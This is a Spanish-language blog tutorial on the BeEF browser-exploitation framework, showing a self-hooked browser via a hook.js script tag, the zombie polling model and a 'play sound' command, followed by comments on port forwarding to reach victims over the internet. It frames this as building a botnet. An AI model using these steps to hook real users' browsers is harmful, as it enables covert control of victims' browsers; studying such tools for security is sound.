Antes de tener nuestra botnet, vamos a echar un vistazo a lo que nos ofrece la CGI de BeEF, a la izquierda observamos dos desplegables con el nombre de Online y Offline browsers, como dijimos antes BeEF infectara a través de javaScript, para probar esto, basta con entrar en su dirección básica, la cual nos deja muy claro que a partir de ese momento estamos infectados (http://127.0.0.1:3000/demos/basic.html)

We are Hooked into BeEF

Si volvemos al panel de control, ya tenemos nuestra primera victima! (aunque seamos nosotros mismos)

Antes de continuar trasteando vamos a ver que ha pasado, y esa respuesta esta en el código fuente de la página,donde nos encontramos  un JS que se carga por ahí…

<script src=”HTTP://127.0.0.1/hook.js ” type=”text/javascript”>

Sí no estáis familiarizados con JS, ese código lo único que hace es imprimir <script src=”HTTP://127.0.0.1/hook.js ” type=”text/javascript”> </script>, en resumen que  nos esta cargando todo ese pedazo de archivo de casi 5K de lineas de código, (pedazo de JS eh?).

A partir de aquí surge la magia por que estamos Hookeados! y eso implica que cada más o menos (sin contar los eventos) cada 5 segundos estaremos preguntando al Servidor si tiene ordenes para el navegador, vamos como un Zombie que necesita ordenes…

Estas ahí? Estas ahí?

Todo muy bonito, pero vamos a sacarle la parte practica, hagamos que la marioneta se mueva, o mejor que hable! si nos vamos al navegador hookeado y luego a Commands podemos enviarle las instrucciones, el sonido esta en Browser > Play sound :

Commands>Browser>Play Sound 

En el momento en el que le mandemos la orden, esta se quedara preparada y cuando el Zombie pregunte si hay ordenes le responderemos que tiene que hablar:

Debo…reproducir…sonidoo….

Al terminar se nos enviara la respuesta de que todo ha ido bien:

OK!

Espero que os haya gustado esta toma de contacto con BeEF!

Anuncios

»

  1. Rubita dice:

    Hola, el post ya es viejo pero quisiera saber si esto solo funciona a nivel local?

    • Ike dice:

      No tiene por que =), puedes hacerlo funcionar al nivel que quieras, ya que lo que hace el framework de BeEF es montarte/levantarte un servidor Web a la escucha en el puerto 3000, puedes acceder a el tanto por la dirección local 127.0.0.1 como por la dirección que tengas en ese momento(192.168.1.X) o si lo quieres llevar a internet, te tendrás que pegar con el Router para crear una re-direccion de puerto del router-servidor de web, pero si lo vas a poner más allá del local yo le cambiaría la pass =P

      Un saludo Rubita, espero haber contestado tu duda.

      • Rubita dice:

        gracias, >_< ya le intente pero solo me toma las máquinas zombies de red local a nivel internet no las agarra tienes skype o algo donde poder contactarte?

Responder

Introduce tus datos o haz clic en un icono para iniciar sesión:

Logo de WordPress.com

Estás comentando usando tu cuenta de WordPress.com. Cerrar sesión / Cambiar )

Imagen de Twitter

Estás comentando usando tu cuenta de Twitter. Cerrar sesión / Cambiar )

Foto de Facebook

Estás comentando usando tu cuenta de Facebook. Cerrar sesión / Cambiar )

Google+ photo

Estás comentando usando tu cuenta de Google+. Cerrar sesión / Cambiar )

Conectando a %s